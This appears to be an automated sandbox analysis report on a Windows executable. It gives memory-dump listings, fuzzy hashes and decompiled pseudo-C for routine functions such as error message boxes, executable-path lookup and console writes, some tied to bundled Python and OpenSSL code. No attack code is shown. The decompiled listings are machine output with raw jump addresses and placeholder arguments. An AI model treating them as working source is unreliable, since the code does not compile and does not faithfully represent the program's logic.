Source File: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID: ..\s\crypto\async\async.c$T
API String ID: 0-2182492907
Opcode ID: e694b929782d19c12b6d176ca896e3583fca2558b7f986e07836b8c6829b0435
Instruction ID: 2cbba0b1ce95c7d37e569ab14020c15481c73816ba93eaa75bce22cef24e9556
Opcode Fuzzy Hash: e694b929782d19c12b6d176ca896e3583fca2558b7f986e07836b8c6829b0435
Instruction Fuzzy Hash: C951C13161866A86E710AB65D4206B9A370EF44790F404479EA6E07BD6FF3DEA09C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D24D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00007FF77FF7DA8D24D0(void* __eflags, void* __rax, long long __rcx, signed long long __rdx, long long __r8, long long __r9, long long _a8, signed long long _a16, char _a24, long long _a32, char _a1048, char _a2072, char _a4120, signed int _a6168, char _a6232) {
				void* __rbx;
				void* __rsi;
				void* _t22;
				void* _t38;
				void* _t39;
				signed long long _t44;
				signed long long _t45;
				void* _t64;
				void* _t74;
				void* _t75;

				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t22 = E00007FF77FF7DA8DAD20(0x1840, __rax, _t74, _t75);
				_t65 = _t64 - __rax;
				_t44 =  *0xda90d008; // 0xe3add53f52b8
				_t45 = _t44 ^ _t64 - __rax;
				_a6168 = _t45;
				_t46 = __rdx;
				E00007FF77FF7DA8D1040(_t22);
				_a16 =  &_a6232;
				_a8 = 0;
				r8d = 0x400;
				E00007FF77FF7DA8E3B34(_t38, _t39,  *_t45 | 0x00000002,  &_a1048, __r8, __rdx);
				E00007FF77FF7DA8E4394(_t45);
				E00007FF77FF7DA8E43B4( *_t45, _t45, __rdx,  &_a6232);
				_a16 = _t45;
				_a8 = __rcx;
				E00007FF77FF7DA8D1B30(_t45,  &_a24,  &_a1048, "%s%s: %s",  &_a1048);
				r8d = 0x800;
				E00007FF77FF7DA8DC170();
				r8d = 0x400;
				E00007FF77FF7DA8D79A0(_t45, _t46,  &_a4120,  &_a24,  &_a6232, "%s%s: %s");
				if (_t45 == 0) goto 0xda8d25df;
				r8d = 0x400;
				E00007FF77FF7DA8D79A0(_t45, _t46,  &_a2072, "Fatal error detected",  &_a6232, "%s%s: %s");
				r9d = 0x30;
				MessageBoxW(??, ??, ??, ??);
				goto 0xda8d25f9;
				r9d = 0x30;
				return E00007FF77FF7DA8DACF0(MessageBoxA(??, ??, ??, ??), 0, _a6168 ^ _t65);
			}

APIs

Part of subcall function 00007FF7DA8D79A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D79DA

MessageBoxW.USER32 ref: 00007FF7DA8D25D7
MessageBoxA.USER32 ref: 00007FF7DA8D25F3

Strings

Fatal error detected, xrefs: 00007FF7DA8D25AB, 00007FF7DA8D25E5
%s%s: %s, xrefs: 00007FF7DA8D2558

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 1878133881-2410924014
Opcode ID: 2ca8b161c2e9c3bcdb1472a4893fefc60b501485010ef6ee025377ec5ef74353
Instruction ID: 270727b3e0b3ab2777241ecc34e6a5c4bb8d6afb301644a0a6c5a4fe7a15981b
Opcode Fuzzy Hash: 2ca8b161c2e9c3bcdb1472a4893fefc60b501485010ef6ee025377ec5ef74353
Instruction Fuzzy Hash: 48318C72628A8281FA21BB10E4517EEE364FF94784FC44076EE8D07A9ADF3CD615CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD741F30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON310(?,?,?,?,?,00007FFCFD741F1C), ref: 00007FFCFD743C13

Part of subcall function 00007FFCFD742010: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFD74205A
Part of subcall function 00007FFCFD742010: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFD742078

PyErr_Format.PYTHON310 ref: 00007FFCFD741F93

Strings

name too long, xrefs: 00007FFCFD743C09
undefined character name '%s', xrefs: 00007FFCFD741F86

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Err_strncmp$FormatString
String ID: name too long$undefined character name '%s'
API String ID: 3882229318-4056717002
Opcode ID: 81816cf60a1bcc302cc1fe3ff3cbeb8f8710d0be9fb126c8309565961db1bd99
Instruction ID: d1686b2faf0cd6e152030acaf4b1e4de70a4f952081bb4a4a97a456c6064b063
Opcode Fuzzy Hash: 81816cf60a1bcc302cc1fe3ff3cbeb8f8710d0be9fb126c8309565961db1bd99
Instruction Fuzzy Hash: 42115472A18D6BC2EB019B14D4A42F9A361FB4575AF400433CA2D4B2E8FF6DD14AC7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D3B80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00007FF77FF7DA8D3B80(void* __rax, long long __rcx, char _a24, signed int _a8216) {
				void* __rbx;
				intOrPtr _t16;
				signed long long _t21;
				signed long long _t22;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t38;
				void* _t39;
				void* _t40;
				void* _t41;

				E00007FF77FF7DA8DAD20(0x2030, __rax, _t40, _t41);
				_t36 = _t35 - __rax;
				_t21 =  *0xda90d008; // 0xe3add53f52b8
				_t22 = _t21 ^ _t35 - __rax;
				_a8216 = _t22;
				r8d = 0x1000;
				if (GetModuleFileNameW(??, ??, ??) != 0) goto 0xda8d3bd2;
				E00007FF77FF7DA8D2620(GetModuleFileNameW(??, ??, ??), _t22, "GetModuleFileNameW", "Failed to get executable path.\n", _t38, _t39);
				goto 0xda8d3bff;
				r8d = 0x1000;
				E00007FF77FF7DA8D7AB0(_t16, __rcx, __rcx,  &_a24, _t33, _t34, _t38);
				if (_t22 != 0) goto 0xda8d3bfa;
				E00007FF77FF7DA8D2770(_t22, "Failed to convert executable path to UTF-8.\n",  &_a24, _t38, _t39);
				goto 0xda8d3bff;
				return E00007FF77FF7DA8DACF0(1, 0, _a8216 ^ _t36);
			}

APIs

GetModuleFileNameW.KERNEL32(?,00007FF7DA8D3679), ref: 00007FF7DA8D3BB1

Part of subcall function 00007FF7DA8D2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7DA8D76B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8D101D), ref: 00007FF7DA8D2654
Part of subcall function 00007FF7DA8D2620: MessageBoxW.USER32 ref: 00007FF7DA8D272C

Strings

Failed to convert executable path to UTF-8., xrefs: 00007FF7DA8D3BEA
GetModuleFileNameW, xrefs: 00007FF7DA8D3BC2
Failed to get executable path., xrefs: 00007FF7DA8D3BBB

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ErrorFileLastMessageModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
API String ID: 2581892565-1977442011
Opcode ID: 04e6919d6207e873115f5cfbaabaf22d19ebcbc8c50bb68e17d57e50300a9c4c
Instruction ID: d4587f5cf85cfe86ec07f74debcbb7f69452307fefef563fc9da97b3946a1904
Opcode Fuzzy Hash: 04e6919d6207e873115f5cfbaabaf22d19ebcbc8c50bb68e17d57e50300a9c4c
Instruction Fuzzy Hash: 52017121B1964388FE62B720E8063BDD351BF987C4FC814B3DC4E86297EE5DE1658720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD866438 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 395COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FFCFDA4756D
memset.VCRUNTIME140 ref: 00007FFCFDA475D9

Strings

@, xrefs: 00007FFCFDA478FA
..\s\crypto\sm2\sm2_crypt.c, xrefs: 00007FFCFDA475A6, 00007FFCFDA475E4, 00007FFCFDA475F8, 00007FFCFDA47610, 00007FFCFDA47673, 00007FFCFDA476BA, 00007FFCFDA476E2, 00007FFCFDA47727, 00007FFCFDA47743, 00007FFCFDA47755, 00007FFCFDA47775, 00007FFCFDA477D0, 00007FFCFDA47ABB, 00007FFCFDA47B03, 00007FFCFDA47B2D, 00007FFCFDA47B5C

Memory Dump Source

Source File: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID: memset
String ID: ..\s\crypto\sm2\sm2_crypt.c$@
API String ID: 2221118986-485510600
Opcode ID: c882ba9c0604a85703c9e8026ccbe839822b8dd4924dca6024d0f7333c9d2aba
Instruction ID: 64cddaabc814f2ce0489a8757aba492c3dace1bdaa5700f11481ecb2bbee46eb
Opcode Fuzzy Hash: c882ba9c0604a85703c9e8026ccbe839822b8dd4924dca6024d0f7333c9d2aba
Instruction Fuzzy Hash: 5402A43261CAAA85EB10DB15E4206AEB760FB85B84F404135EAAD07BE5EF3DD505C7F0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EB9C0 Relevance: 6.3, APIs: 4, Instructions: 299
fileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00007FF77FF7DA8EB9C0(void* __eax, signed int __edx, void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t184;
				signed int _t188;
				signed int _t195;
				signed int _t200;
				intOrPtr _t209;
				void* _t211;
				signed char _t212;
				void* _t229;
				void* _t262;
				signed long long _t263;
				long long _t268;
				long long _t270;
				void* _t271;
				long long _t273;
				intOrPtr* _t279;
				intOrPtr* _t286;
				long long _t288;
				long long _t315;
				void* _t323;
				long long _t324;
				void* _t325;
				long long _t326;
				intOrPtr* _t327;
				long long _t328;
				signed char* _t329;
				signed char* _t330;
				signed char* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				signed long long _t335;
				intOrPtr _t338;
				intOrPtr _t341;
				void* _t343;
				signed long long _t345;
				signed long long _t347;
				long long _t356;
				void* _t360;
				long long _t361;
				signed long long _t364;
				char _t365;
				signed long long _t366;
				void* _t369;
				signed char* _t370;
				signed long long _t372;

				_t262 = _t334;
				_t333 = _t262 - 0x57;
				_t335 = _t334 - 0xd0;
				 *((long long*)(_t333 - 9)) = 0xfffffffe;
				 *((long long*)(_t262 + 8)) = __rbx;
				_t263 =  *0xda90d008; // 0xe3add53f52b8
				 *(_t333 + 0x17) = _t263 ^ _t335;
				_t327 = __r8;
				 *((long long*)(_t333 - 0x41)) = __r8;
				_t279 = __rcx;
				 *((long long*)(_t333 - 0x59)) =  *((intOrPtr*)(_t333 + 0x7f));
				_t364 = __edx >> 6;
				 *(_t333 - 0x39) = _t364;
				_t372 = __edx + __edx * 8;
				_t268 =  *((intOrPtr*)( *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 + _t364 * 8)) + 0x28 + _t372 * 8));
				 *((long long*)(_t333 - 0x19)) = _t268;
				r12d = r9d;
				_t361 = _t360 + __r8;
				 *((long long*)(_t333 - 0x61)) = _t361;
				 *((intOrPtr*)(_t333 - 0x49)) = GetConsoleOutputCP();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t333 - 0x59)) + 0x28)) != dil) goto 0xda8eba60;
				E00007FF77FF7DA8E3970(_t268, __rcx,  *((intOrPtr*)(_t333 - 0x59)), __r8);
				_t209 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 - 0x59)) + 0x18)) + 0xc));
				 *((intOrPtr*)(_t333 - 0x45)) = _t209;
				 *_t279 = _t268;
				 *((intOrPtr*)(_t279 + 8)) = 0;
				if ( *((intOrPtr*)(_t333 - 0x41)) - _t361 >= 0) goto 0xda8ebe0b;
				_t345 = __edx >> 6;
				 *(_t333 - 0x11) = _t345;
				 *((char*)(_t333 - 0x71)) =  *_t327;
				 *((intOrPtr*)(_t333 - 0x6d)) = 0;
				r12d = 1;
				if (_t209 != 0xfde9) goto 0xda8ebc25;
				_t286 = 0x3e + _t372 * 8 +  *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 + _t345 * 8));
				if ( *_t286 == dil) goto 0xda8ebad2;
				_t369 = _t326 + 1;
				if (_t369 - 5 < 0) goto 0xda8ebabf;
				if (_t369 <= 0) goto 0xda8ebbbb;
				r12d =  *((char*)(_t286 + 0x7ff7da90d2d1));
				r12d = r12d + 1;
				_t184 = r12d - 1;
				 *((intOrPtr*)(_t333 - 0x51)) = _t184;
				_t338 = _t184;
				if (_t338 -  *((intOrPtr*)(_t333 - 0x61)) - _t327 > 0) goto 0xda8ebd88;
				_t288 = _t326;
				 *((char*)(_t333 + _t288 - 1)) =  *((intOrPtr*)(0x3e + _t372 * 8 +  *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 + _t345 * 8))));
				if (_t288 + 1 - _t369 < 0) goto 0xda8ebb23;
				if (_t338 <= 0) goto 0xda8ebb53;
				E00007FF77FF7DA8DBAC0();
				_t356 =  *((intOrPtr*)(_t333 - 0x59));
				_t315 = _t326;
				 *((intOrPtr*)( *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 + _t364 * 8)) + _t315 + 0x3e + _t372 * 8)) = dil;
				if (_t315 + 1 - _t369 < 0) goto 0xda8ebb56;
				 *((long long*)(_t333 - 0x31)) = _t326;
				_t270 = _t333 - 1;
				 *((long long*)(_t333 - 0x29)) = _t270;
				_t188 = (0 | r12d == 0x00000004) + 1;
				r12d = _t188;
				r8d = _t188;
				 *((long long*)(_t335 + 0x20)) = _t356;
				E00007FF77FF7DA8EF4CC(_t270, _t279, _t333 - 0x6d, _t333 - 0x29, _t338, _t333 - 0x31);
				if (_t270 == 0xffffffff) goto 0xda8ebe0b;
				_t328 = _t327 +  *((intOrPtr*)(_t333 - 0x51)) - 1;
				goto 0xda8ebcb6;
				_t365 =  *((char*)(_t270 + 0x7ff7da90d2d0));
				_t211 = _t365 + 1;
				_t271 = _t211;
				if (_t271 -  *((intOrPtr*)(_t333 - 0x61)) - _t328 > 0) goto 0xda8ebdb6;
				 *((long long*)(_t333 - 0x51)) = _t326;
				 *((long long*)(_t333 - 0x21)) = _t328;
				_t195 = (0 | _t211 == 0x00000004) + 1;
				r14d = _t195;
				r8d = _t195;
				 *((long long*)(_t335 + 0x20)) = _t356;
				_t347 = _t333 - 0x51;
				E00007FF77FF7DA8EF4CC(_t271, _t279, _t333 - 0x6d, _t333 - 0x21,  *((intOrPtr*)(_t333 - 0x61)) - _t328, _t347);
				if (_t271 == 0xffffffff) goto 0xda8ebe0b;
				_t329 = _t328 + _t365;
				r12d = r14d;
				_t366 =  *(_t333 - 0x39);
				goto 0xda8ebcb6;
				_t341 =  *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 + _t366 * 8));
				_t212 =  *(_t341 + 0x3d + _t372 * 8);
				if ((_t212 & 0x00000004) == 0) goto 0xda8ebc58;
				 *((char*)(_t333 + 7)) =  *((intOrPtr*)(_t341 + 0x3e + _t372 * 8));
				 *((char*)(_t333 + 8)) =  *_t329;
				 *(_t341 + 0x3d + _t372 * 8) = _t212 & 0x000000fb;
				r8d = 2;
				goto 0xda8ebca1;
				r9d =  *_t329 & 0x000000ff;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t356 + 0x18)))) + _t347 * 2)) >= 0) goto 0xda8ebc9b;
				_t370 =  &(_t329[1]);
				if (_t370 -  *((intOrPtr*)(_t333 - 0x61)) >= 0) goto 0xda8ebde8;
				r8d = 2;
				if (E00007FF77FF7DA8EDB00(_t212 & 0x000000fb, _t229, _t279, _t333 - 0x6d, _t329, _t326, _t329, _t333, _t341, _t356) == 0xffffffff) goto 0xda8ebe0b;
				_t330 = _t370;
				goto 0xda8ebcb6;
				_t200 = E00007FF77FF7DA8EDB00(_t212 & 0x000000fb, _t229, _t279, _t333 - 0x6d, _t330, _t326, _t330, _t333, _t361, _t356);
				if (_t200 == 0xffffffff) goto 0xda8ebe0b;
				_t331 =  &(_t330[1]);
				 *((long long*)(_t335 + 0x38)) = _t326;
				 *((long long*)(_t335 + 0x30)) = _t326;
				 *((intOrPtr*)(_t335 + 0x28)) = 5;
				_t273 = _t333 + 0xf;
				 *((long long*)(_t335 + 0x20)) = _t273;
				r9d = r12d;
				_t343 = _t333 - 0x6d;
				E00007FF77FF7DA8EF008();
				r14d = _t200;
				if (_t200 == 0) goto 0xda8ebe0b;
				 *((long long*)(_t335 + 0x20)) = _t326;
				r8d = _t200;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xda8ebe03;
				 *((intOrPtr*)(_t279 + 4)) = __esi -  *((intOrPtr*)(_t333 - 0x41)) +  *((intOrPtr*)(_t279 + 8));
				if ( *((intOrPtr*)(_t333 - 0x69)) - r14d < 0) goto 0xda8ebe0b;
				if ( *((char*)(_t333 - 0x71)) != 0xa) goto 0xda8ebd6e;
				 *((short*)(_t333 - 0x71)) = 0xd;
				 *((long long*)(_t335 + 0x20)) = _t326;
				_t130 = _t273 - 0xc; // 0x1
				r8d = _t130;
				_t323 = _t333 - 0x71;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xda8ebe03;
				if ( *((intOrPtr*)(_t333 - 0x69)) - 1 < 0) goto 0xda8ebe0b;
				 *((intOrPtr*)(_t279 + 8)) =  *((intOrPtr*)(_t279 + 8)) + 1;
				 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t279 + 4)) + 1;
				if (_t331 -  *((intOrPtr*)(_t333 - 0x61)) >= 0) goto 0xda8ebe0b;
				goto 0xda8eba89;
				if (_t323 <= 0) goto 0xda8ebdb1;
				_t332 = _t331 - _t370;
				 *((char*)( *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 + _t366 * 8)) + _t370 + 0x3e + _t372 * 8)) =  *((intOrPtr*)(_t332 + _t370));
				if (1 - _t323 < 0) goto 0xda8ebd90;
				 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t279 + 4)) +  *((intOrPtr*)(_t279 + 4));
				goto 0xda8ebe0b;
				if (_t343 <= 0) goto 0xda8ebde2;
				_t324 = _t326;
				 *((char*)( *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 +  *(_t333 - 0x39) * 8)) + _t324 + 0x3e + _t372 * 8)) =  *((intOrPtr*)(_t324 + _t332));
				_t325 = _t324 + 1;
				if (2 - _t343 < 0) goto 0xda8ebdc2;
				 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t279 + 4)) + r8d;
				goto 0xda8ebe0b;
				 *((intOrPtr*)(_t343 + 0x3e + _t372 * 8)) = r9b;
				 *( *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 + _t366 * 8)) + 0x3d + _t372 * 8) =  *( *((intOrPtr*)(0x7ff7da8d0000 + 0x4ca20 + _t366 * 8)) + 0x3d + _t372 * 8) | 0x00000004;
				_t173 = _t325 + 1; // 0x1
				 *((intOrPtr*)(_t279 + 4)) = _t173;
				goto 0xda8ebe0b;
				 *_t279 = GetLastError();
				return E00007FF77FF7DA8DACF0(_t207,  *((intOrPtr*)(_t333 - 0x45)),  *(_t333 + 0x17) ^ _t335);
			}

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF7DA8EBA3F
WriteFile.KERNEL32 ref: 00007FF7DA8EBD07
WriteFile.KERNEL32 ref: 00007FF7DA8EBD4D
GetLastError.KERNEL32 ref: 00007FF7DA8EBE03

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 4cae027592c5ba934747693b00d7aff08725dc1ee470aad96940ecba80e61e26
Instruction ID: 3015a7e8fc187f18b525ac0f8d476e40feaf1f2652b40fe8f83079da93e8bb0b
Opcode Fuzzy Hash: 4cae027592c5ba934747693b00d7aff08725dc1ee470aad96940ecba80e61e26
Instruction Fuzzy Hash: C2D11132B08A8189F712DF64C4442ACB7B1FB64798B848176CE4E97B8ADE3DD526C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EC380 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00007FF77FF7DA8EC380(void* __ebx, signed int __ecx, void* __esi, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10, void* __r11) {
				signed long long _v88;
				char _v96;
				void* _v108;
				signed int _v112;
				intOrPtr _v120;
				signed int _v124;
				long _v128;
				signed int _v136;
				long long _v144;
				signed int _v152;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed short _t99;
				void* _t107;
				long _t116;
				signed int _t117;
				void* _t122;
				signed short _t127;
				signed int _t130;
				signed short _t133;
				signed short _t158;
				signed short _t166;
				signed long long _t179;
				signed int _t183;
				signed short* _t196;
				signed int _t203;
				signed int _t204;
				signed short* _t205;
				void* _t207;
				void* _t217;
				void* _t218;
				signed long long _t220;
				void* _t221;
				signed long long _t222;
				signed long long _t223;
				void* _t224;
				signed short* _t226;

				_t218 = __r11;
				_t217 = __r10;
				_t196 = __rdx;
				_t122 = __ebx;
				r14d = r8d;
				_t183 = __r9;
				_t205 = __rdx;
				if (r8d == 0) goto 0xda8ec673;
				if (__rdx != 0) goto 0xda8ec3e7;
				 *((char*)(__r9 + 0x38)) = 1;
				r8d = 0;
				 *((intOrPtr*)(__r9 + 0x34)) = 0;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				r9d = 0;
				_v144 = __r9;
				_v152 = _t204;
				E00007FF77FF7DA8E9C34(__rax, __r9, __rcx, __rdx, __rdx, _t207, __r8);
				goto 0xda8ec675;
				_t220 = __ecx >> 6;
				_v88 = _t220;
				_t223 = __ecx + __ecx * 8;
				_t99 =  *((intOrPtr*)(0xda91ca20 + 0x39 + _t223 * 8));
				_v136 = _t99;
